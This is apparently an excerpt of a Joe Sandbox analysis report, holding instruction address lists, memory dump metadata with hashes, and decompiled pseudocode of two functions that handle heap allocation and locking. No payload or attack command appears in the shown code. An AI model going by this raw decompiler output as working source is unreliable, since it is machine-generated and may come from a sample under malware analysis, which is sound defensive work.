                                          0x010bdaf8
                                          0x010bdafb
                                          0x010bdb03
                                          0x010bdb11
                                          0x010bdb16
                                          0x010bdb19
                                          0x010bdb1b
                                          0x0110b52c
                                          0x0110b531
                                          0x0110b534
                                          0x010bdb21
                                          0x010bdb21
                                          0x010bdb24
                                          0x010bdcd9
                                          0x010bdce2
                                          0x010bdce5
                                          0x010bdd6a
                                          0x010bdd6d
                                          0x00000000
                                          0x010bdd73
                                          0x0110b51a
                                          0x0110b51c
                                          0x0110b51f
                                          0x0110b524
                                          0x00000000
                                          0x0110b524
                                          0x010bdce7
                                          0x010bdce7
                                          0x010bdce7
                                          0x00000000
                                          0x010bdce7
                                          0x00000000
                                          0x010bdb2a
                                          0x010bdb2c
                                          0x010bdb31
                                          0x010bdb33
                                          0x010bdb36
                                          0x010bdb39
                                          0x010bdb3b
                                          0x010bdb66
                                          0x010bdb66
                                          0x010bdb3d
                                          0x010bdb3d
                                          0x010bdb3e
                                          0x010bdb46
                                          0x010bdb47
                                          0x010bdb49
                                          0x010bdb4c
                                          0x010bdb53
                                          0x010bdb55
                                          0x010bdb58
                                          0x010bdb5a
                                          0x0110b50a
                                          0x0110b50f
                                          0x0110b512
                                          0x010bdb60
                                          0x010bdb60
                                          0x010bdb63
                                          0x010bdb63
                                          0x00000000
                                          0x010bdb63
                                          0x010bdb5a
                                          0x010bdb3b
                                          0x010bdb24
                                          0x010bdb69
                                          0x010bdb69
                                          0x010bdb6c
                                          0x010bdb6f
                                          0x010bdb74
                                          0x0110b557
                                          0x0110b557
                                          0x0110b55e
                                          0x010bdb7a
                                          0x010bdb7c
                                          0x010bdb7f
                                          0x010bdb82
                                          0x010bdb85
                                          0x00000000
                                          0x010bdb8b
                                          0x010bdb8b
                                          0x010bdb8d
                                          0x010bdb9b
                                          0x010bdb9b
                                          0x010bdb9d
                                          0x010bdba0
                                          0x010bdba2
                                          0x010bdba4
                                          0x010bdba7
                                          0x010bdba9
                                          0x010bdbae
                                          0x010bdbae
                                          0x010bdbb1
                                          0x010bdbb4
                                          0x010bdbb4
                                          0x010bdbb7
                                          0x010bdbba
                                          0x010bdcd2
                                          0x010bdcd4
                                          0x00000000
                                          0x010bdbc0
                                          0x010bdbc0
                                          0x010bdbd2
                                          0x010bdbd7
                                          0x010bdbda
                                          0x010bdbdd
                                          0x010bdbdf
                                          0x00000000
                                          0x010bdbe5
                                          0x010bdbe5
                                          0x010bdbee
                                          0x010bdbf1
                                          0x0110b541
                                          0x0110b544
                                          0x00000000
                                          0x0110b546
                                          0x0110b546
                                          0x00000000
                                          0x0110b546
                                          0x010bdbf7
                                          0x010bdbf7
                                          0x010bdbfd
                                          0x010bdbfd
                                          0x010bdbff
                                          0x010bdc0b
                                          0x010bdc15
                                          0x010bdc1b
                                          0x010bdc1d
                                          0x010bdc21
                                          0x010bdc21
                                          0x010bdc23
                                          0x010bdc23
                                          0x010bdc26
                                          0x010bdc29
                                          0x010bdc2b
                                          0x00000000
                                          0x00000000
                                          0x010bdc31
                                          0x010bdc34
                                          0x010bdc36
                                          0x010bdcbf
                                          0x010bdcbf
                                          0x010bdcc2
                                          0x00000000
                                          0x010bdc3c
                                          0x010bdc41
                                          0x010bdc43
                                          0x00000000
                                          0x010bdc45
                                          0x010bdc45
                                          0x010bdc47
                                          0x00000000
                                          0x010bdc4d
                                          0x010bdc4d
                                          0x010bdc50
                                          0x010bdc52
                                          0x010bdc55
                                          0x010bdcfa
                                          0x010bdcfe
                                          0x010bdd08
                                          0x010bdd0a
                                          0x010bdd0c
                                          0x00000000
                                          0x010bdd12
                                          0x010bdd15
                                          0x010bdd2d
                                          0x010bdd2f
                                          0x010bdd32
                                          0x010bdd35
                                          0x00000000
                                          0x010bdd35
                                          0x010bdc5b
                                          0x010bdc5b
                                          0x010bdc5e
                                          0x010bdc61
                                          0x010bdc64
                                          0x010bdc67
                                          0x010bdc67
                                          0x010bdc6a
                                          0x010bdc6c
                                          0x010bdc8e
                                          0x010bdc8e
                                          0x010bdc91
                                          0x010bdc93
                                          0x010bdcce
                                          0x010bdcce
                                          0x010bdc95
                                          0x010bdc9c
                                          0x010bdc6e
                                          0x010bdc72
                                          0x010bdc75
                                          0x010bdc77
                                          0x010bdc79
                                          0x0110b551
                                          0x0110b551
                                          0x00000000
                                          0x010bdc7f
                                          0x010bdc7f
                                          0x010bdc81
                                          0x00000000
                                          0x010bdc83
                                          0x010bdc86
                                          0x010bdc88
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010bdc88
                                          0x010bdc81
                                          0x010bdc79
                                          0x010bdc6c
                                          0x010bdc55
                                          0x010bdc47
                                          0x010bdc43
                                          0x00000000
                                          0x010bdc36
                                          0x010bdc23
                                          0x00000000
                                          0x010bdbff
                                          0x010bdbf1
                                          0x010bdbdf
                                          0x010bdb8f
                                          0x010bdb92
                                          0x010bdb95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010bdb95
                                          0x010bdb8d
                                          0x010bdb85
                                          0x010bdb74
                                          0x010bdc9f
                                          0x010bdca2
                                          0x010bdcb0
                                          0x010bdcb0
                                          0x010bdad1
                                          0x0110b4e5
                                          0x0110b4c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010bd831
                                          0x00000000
                                          0x010bd800
                                          0x0110b47f
                                          0x0110b485
                                          0x00000000
                                          0x0110b485
                                          0x010bd665
                                          0x010bd652
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26c523e398fccae7f9eea675472c758a8ce356ff840e8e0dbb16921209c6087c
                                          • Instruction ID: 170d27e147a6800d69e04e2a514dfeab0d32efcce9847ff23974d872374f7d7d
                                          • Opcode Fuzzy Hash: 26c523e398fccae7f9eea675472c758a8ce356ff840e8e0dbb16921209c6087c
                                          • Instruction Fuzzy Hash: E8E1CF34A0435A8FEB29CF58C984BE9BBB2BF45308F0501E9D9999B291D770A981CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010B849B Relevance: .3, Instructions: 290COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E010B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x117f9c0);
				E010FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1197b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E010BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E010C2280( *[fs:0x30], 0x1198550);
						_t139 =  *0x1197b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E010DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E010BFFB0(_t193, _t235, 0x1198550);
								L5:
								return E010FD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E010A1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1197b9c; // 0x0
							_t235 = L010C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1197b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E010DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E010BFFB0(_t193, _t235, 0x1198550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L010C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L010C77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1197b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1197b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E010E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1197b9c; // 0x0
									_t214 = L010C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E010E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1197b10 =  *0x1197b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1197b04 =  *0x1197b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L010C77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L010C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1197b08 =  *0x1197b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E010E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E010EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L010C77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E010DA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L010C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E010E96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                          0x010b849b
                                          0x010b849b
                                          0x010b849b
                                          0x010b849b
                                          0x010b849d
                                          0x010b84a2
                                          0x010b84a7
                                          0x010b84b1
                                          0x010b84d8
                                          0x00000000
                                          0x010b84b3
                                          0x010b84c4
                                          0x010b84c9
                                          0x010b84cd
                                          0x010b84cf
                                          0x010b84cf
                                          0x010b84d6
                                          0x010b84e6
                                          0x010b84e9
                                          0x010b84ec
                                          0x010b84ef
                                          0x010b84f2
                                          0x010b84f4
                                          0x010b84fc
                                          0x010b8501
                                          0x010b8506
                                          0x010b8509
                                          0x010b86e0
                                          0x010b86e5
                                          0x010b86e8
                                          0x010b86ed
                                          0x010b86f0
                                          0x010b86f2
                                          0x01109afd
                                          0x01109b02
                                          0x010b84da
                                          0x010b84df
                                          0x010b84df
                                          0x010b86fa
                                          0x010b86fd
                                          0x010b86fe
                                          0x010b8701
                                          0x010b8706
                                          0x010b8709
                                          0x010b870b
                                          0x00000000
                                          0x00000000
                                          0x010b8711
                                          0x010b8725
                                          0x010b8727
                                          0x010b872a
                                          0x010b872c
                                          0x01109af0
                                          0x01109af5
                                          0x010b8732
                                          0x010b8732
                                          0x010b8732
                                          0x010b8735
                                          0x010b8737
                                          0x010b8515
                                          0x010b8515
                                          0x010b8518
                                          0x010b851d
                                          0x010b8523
                                          0x010b8527
                                          0x010b852b
                                          0x010b8537
                                          0x010b8539
                                          0x010b853c
                                          0x010b853e
                                          0x010b868c
                                          0x010b8691
                                          0x010b8699
                                          0x010b869b
                                          0x010b8744
                                          0x010b8748
                                          0x010b86a1
                                          0x010b86a1
                                          0x010b86a1
                                          0x010b86a4
                                          0x010b86a8
                                          0x01109bdf
                                          0x01109bdf
                                          0x010b86ae
                                          0x010b86b0
                                          0x00000000
                                          0x010b86b6
                                          0x00000000
                                          0x01109be9
                                          0x010b86b0
                                          0x010b8544
                                          0x010b854a
                                          0x010b854d
                                          0x010b8551
                                          0x010b876e
                                          0x010b8778
                                          0x010b877b
                                          0x010b8780
                                          0x010b8557
                                          0x010b8557
                                          0x010b855d
                                          0x010b855d
                                          0x010b856b
                                          0x010b856e
                                          0x010b8570
                                          0x010b8573
                                          0x010b8576
                                          0x010b8576
                                          0x010b8579
                                          0x010b857b
                                          0x00000000
                                          0x00000000
                                          0x010b8581
                                          0x010b85a0
                                          0x010b85a2
                                          0x010b85a5
                                          0x010b85a7
                                          0x01109b1b
                                          0x01109b1b
                                          0x010b862e
                                          0x010b862e
                                          0x010b8631
                                          0x010b8631
                                          0x010b8634
                                          0x010b8636
                                          0x010b8669
                                          0x010b8669
                                          0x010b866b
                                          0x01109bbf
                                          0x01109bc4
                                          0x01109bc8
                                          0x01109bce
                                          0x01109bce
                                          0x010b8671
                                          0x010b8671
                                          0x010b8674
                                          0x010b8676
                                          0x01109bae
                                          0x01109bae
                                          0x010b8676
                                          0x010b867c
                                          0x010b867e
                                          0x010b8688
                                          0x010b8688
                                          0x00000000
                                          0x010b867e
                                          0x010b8638
                                          0x010b8638
                                          0x010b863b
                                          0x010b863e
                                          0x010b863f
                                          0x010b8642
                                          0x010b8645
                                          0x010b8648
                                          0x010b864d
                                          0x01109b69
                                          0x01109b6e
                                          0x01109b7b
                                          0x01109b81
                                          0x01109b85
                                          0x01109b89
                                          0x01109ba7
                                          0x01109b8b
                                          0x01109b91
                                          0x01109b9a
                                          0x01109b9f
                                          0x01109b9f
                                          0x010b8788
                                          0x010b878d
                                          0x010b8763
                                          0x010b8763
                                          0x010b8766
                                          0x00000000
                                          0x010b8766
                                          0x01109b70
                                          0x00000000
                                          0x01109b70
                                          0x010b8656
                                          0x010b865a
                                          0x010b865c
                                          0x010b8752
                                          0x010b8756
                                          0x00000000
                                          0x00000000
                                          0x010b875e
                                          0x00000000
                                          0x010b875e
                                          0x010b8662
                                          0x010b8662
                                          0x010b8662
                                          0x010b8666
                                          0x00000000
                                          0x010b8666
                                          0x010b85b7
                                          0x010b85b9
                                          0x010b85bc
                                          0x010b85bf
                                          0x010b85cc
                                          0x010b85d1
                                          0x010b85d4
                                          0x010b85db
                                          0x010b85de
                                          0x010b85e0
                                          0x01109b5f
                                          0x00000000
                                          0x01109b5f
                                          0x010b85e6
                                          0x010b85ea
                                          0x010b86c3
                                          0x010b86c5
                                          0x010b86c8
                                          0x010b86ca
                                          0x01109b16
                                          0x00000000
                                          0x01109b16
                                          0x010b86d6
                                          0x010b85f6
                                          0x010b85f6
                                          0x010b85f9
                                          0x010b8602
                                          0x010b8606
                                          0x010b860a
                                          0x010b860b
                                          0x010b860e
                                          0x010b8611
                                          0x00000000
                                          0x010b8611
                                          0x010b85f3
                                          0x00000000
                                          0x010b85f3
                                          0x010b8619
                                          0x010b861e
                                          0x010b861e
                                          0x010b8621
                                          0x010b8622
                                          0x010b8623
                                          0x010b8625
                                          0x010b862c
                                          0x00000000
                                          0x010b873d
                                          0x00000000
                                          0x010b873d
                                          0x010b8737
                                          0x010b850f
                                          0x010b8512
                                          0x00000000
                                          0x010b8512
                                          0x00000000
                                          0x010b84d6

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54f3af4c377299ccdd6abc2ebc716940a7c38175a201c2f1e9ee29d3f35f22b8
                                          • Instruction ID: 74568eb87fc95aa2db23cf4d5090f1e0ed33a6a2fd4d874a5bde4e5ade0bdff2
                                          • Opcode Fuzzy Hash: 54f3af4c377299ccdd6abc2ebc716940a7c38175a201c2f1e9ee29d3f35f22b8
                                          • Instruction Fuzzy Hash: 55B16C70E0020ADFDB29DFD9C994AEDBBB9BF48304F10812AE555AB295D770A841CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D513A Relevance: .3, Instructions: 258COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E010D513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x119d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E010ED0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E010C2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L010C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E010EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E010BFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x119b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E010EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                          0x010d5142
                                          0x010d514c
                                          0x010d5150
                                          0x010d5157
                                          0x010d5159
                                          0x010d515e
                                          0x010d5165
                                          0x010d5169
                                          0x010d516c
                                          0x010d5172
                                          0x010d5176
                                          0x010d517a
                                          0x010d517a
                                          0x010d517a
                                          0x010d517f
                                          0x01116d8b
                                          0x01116d8e
                                          0x01116d91
                                          0x01116d95
                                          0x01116d98
                                          0x01116d9c
                                          0x01116da0
                                          0x01116da3
                                          0x01116da7
                                          0x01116e26
                                          0x01116e26
                                          0x01116e2a
                                          0x010d51f9
                                          0x010d51f9
                                          0x010d51fe
                                          0x01116e33
                                          0x01116e33
                                          0x01116e39
                                          0x01116e3d
                                          0x01116e46
                                          0x01116e50
                                          0x00000000
                                          0x00000000
                                          0x01116e52
                                          0x01116e53
                                          0x01116e56
                                          0x01116e5d
                                          0x00000000
